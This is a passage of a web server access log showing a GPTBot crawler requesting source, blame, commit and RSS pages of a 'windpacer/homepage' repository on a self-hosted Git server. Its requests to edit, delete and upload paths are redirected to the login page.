74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html" +[17/Feb/2026:15:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components" [Client 74.7.227.38] [Length 10788] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html" +[17/Feb/2026:15:10:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html" +[17/Feb/2026:15:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json" [Client 74.7.227.38] [Length 11913] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json" [Client 74.7.227.38] [Length 12072] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js" [Client 74.7.227.38] [Length 10261] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images" [Client 74.7.227.38] [Length 11578] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:10:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/vite.config.ts" +[17/Feb/2026:15:10:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/vite.config.ts" +[17/Feb/2026:15:10:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" +[17/Feb/2026:15:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/services" +[17/Feb/2026:15:10:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/types.ts" +[17/Feb/2026:15:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16665] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components" +[17/Feb/2026:15:10:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/.gitignore" +[17/Feb/2026:15:10:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/types.ts" +[17/Feb/2026:15:10:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" +[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/services" +[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js" [Client 74.7.227.38] [Length 11174] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images" [Client 74.7.227.38] [Length 10400] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:10:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets" +[17/Feb/2026:15:10:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/services" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services" +[17/Feb/2026:15:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/services" +[17/Feb/2026:15:10:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components" +[17/Feb/2026:15:10:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/.gitignore" +[17/Feb/2026:15:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/.gitignore" +[17/Feb/2026:15:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:10:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets" +[17/Feb/2026:15:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets" +[17/Feb/2026:15:10:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/components" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/components" +[17/Feb/2026:15:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/types.ts" [Client 74.7.227.38] [Length 11029] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" +[17/Feb/2026:15:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 9777] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:10:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/tsconfig.json" +[17/Feb/2026:15:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14103] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" +[17/Feb/2026:15:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/package.json" +[17/Feb/2026:15:10:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js" +[17/Feb/2026:15:10:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" +[17/Feb/2026:15:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/tsconfig.json" +[17/Feb/2026:15:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 15068] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14448] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components" +[17/Feb/2026:15:10:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/html/assets/js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" +[17/Feb/2026:15:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/html/assets/js" +[17/Feb/2026:15:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 11455] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" +[17/Feb/2026:15:10:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/types.ts" +[17/Feb/2026:15:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/types.ts" +[17/Feb/2026:15:10:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/types.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/types.ts" +[17/Feb/2026:15:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/types.ts" +[17/Feb/2026:15:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" +[17/Feb/2026:15:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14016] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9778] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:15:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Footer.tsx" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/components/Header.tsx" [Client 74.7.227.38] [Length 828] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Header.tsx" +[17/Feb/2026:15:11:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/vite.config.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/vite.config.ts" +[17/Feb/2026:15:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr 